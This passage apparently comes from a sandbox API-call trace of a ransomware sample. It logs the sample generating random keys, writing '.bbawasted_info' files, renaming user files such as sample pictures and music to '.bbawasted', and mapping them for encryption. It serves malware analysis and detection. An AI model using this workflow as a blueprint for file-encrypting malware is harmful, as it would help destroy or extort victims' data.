CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.868] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.868] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.868] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.868] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.868] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.877] SetEndOfFile (hFile=0x11c) returned 1 [0077.881] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.881] CloseHandle (hObject=0x11c) returned 1 [0077.882] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2990 | out: hHeap=0x580000) returned 1 [0077.883] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.883] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.883] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.883] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0077.883] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26e) returned 0x5d0700 [0077.883] lstrcpyW (in: lpString1=0x5d0764, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.883] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.883] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.884] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.884] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted_info" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.885] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.886] SetEndOfFile (hFile=0x11c) returned 1 [0077.886] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.886] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.887] lstrcpyW (in: lpString1=0x5d0764, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.bbawasted")) returned 1 [0077.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.891] GetLastError () returned 0x5 [0077.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.bbawasted")) returned 0x23 [0077.891] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted", dwFileAttributes=0x22) returned 1 [0077.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.892] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.892] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.bbawasted", dwFileAttributes=0x23) returned 1 [0077.892] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5bab58 [0077.892] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.893] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5baba0 | out: pbBuffer=0x5baba0) returned 1 [0077.893] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.893] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.894] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.894] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.902] SetEndOfFile (hFile=0x11c) returned 1 [0077.904] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.904] CloseHandle (hObject=0x11c) returned 1 [0077.906] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0077.906] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.907] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.907] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.907] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0077.907] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5afbd8 [0077.907] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.907] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.907] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.908] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.908] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted_info" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.908] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.909] SetEndOfFile (hFile=0x11c) returned 1 [0077.909] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.909] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.909] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.bbawasted")) returned 1 [0077.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.910] GetLastError () returned 0x5 [0077.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.bbawasted")) returned 0x23 [0077.910] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted", dwFileAttributes=0x22) returned 1 [0077.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.910] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.911] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.bbawasted", dwFileAttributes=0x23) returned 1 [0077.911] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5d0700 [0077.911] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.912] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.912] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.912] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.913] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.913] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.921] SetEndOfFile (hFile=0x11c) returned 1 [0077.923] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.923] CloseHandle (hObject=0x11c) returned 1 [0077.926] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5afbd8 | out: hHeap=0x580000) returned 1 [0077.926] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.927] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.927] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.927] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0077.927] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x270) returned 0x5d0700 [0077.927] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.927] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.927] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.928] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.928] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.bbawasted_info" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.934] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.935] SetEndOfFile (hFile=0x11c) returned 1 [0077.936] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.936] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.936] lstrcpyW (in: lpString1=0x5d0766, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.bbawasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.bbawasted")) returned 1 [0077.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.bbawasted" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.936] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.956] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.957] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5baba0 | out: pbBuffer=0x5baba0) returned 1 [0077.957] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.957] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.957] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.957] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.966] SetEndOfFile (hFile=0x11c) returned 1 [0077.968] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.968] CloseHandle (hObject=0x11c) returned 1 [0077.970] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0077.970] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.970] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.970] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.971] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0077.971] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26e) returned 0x5d0700 [0077.971] lstrcpyW (in: lpString1=0x5d0764, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.971] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.971] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.971] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.971] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.bbawasted_info" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.973] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.974] SetEndOfFile (hFile=0x11c) returned 1 [0077.974] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.974] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.974] lstrcpyW (in: lpString1=0x5d0764, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.974] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.bbawasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.bbawasted")) returned 1 [0077.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.bbawasted" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.975] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0078.823] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0078.828] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d2c58 | out: pbBuffer=0x5d2c58) returned 1 [0078.828] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.828] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0078.829] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0078.829] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.872] SetEndOfFile (hFile=0x11c) returned 1 [0078.874] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0078.875] CloseHandle (hObject=0x11c) returned 1 [0078.876] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0078.877] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0078.877] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0078.877] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.877] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0078.877] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5abe80 [0078.878] lstrcpyW (in: lpString1=0x5abefc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0078.878] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0078.878] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0078.878] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0078.878] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0078.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.880] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0078.881] SetEndOfFile (hFile=0x11c) returned 1 [0078.881] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.881] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0078.881] lstrcpyW (in: lpString1=0x5abefc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0078.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.bbawasted")) returned 1 [0078.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.bbawasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0078.888] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.019] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0079.019] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0079.019] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.019] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0079.020] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0079.020] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.029] SetEndOfFile (hFile=0x11c) returned 1 [0079.031] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0079.031] CloseHandle (hObject=0x11c) returned 1 [0079.032] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abe80 | out: hHeap=0x580000) returned 1 [0079.033] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0079.033] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0079.033] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.033] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0079.034] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5afbd8 [0079.034] lstrcpyW (in: lpString1=0x5afc4e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0079.034] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0079.034] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0079.034] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0079.034] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0079.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.bbawasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.035] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0079.036] SetEndOfFile (hFile=0x11c) returned 1 [0079.036] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.036] HeapFree (in: hHeap=0x580000, 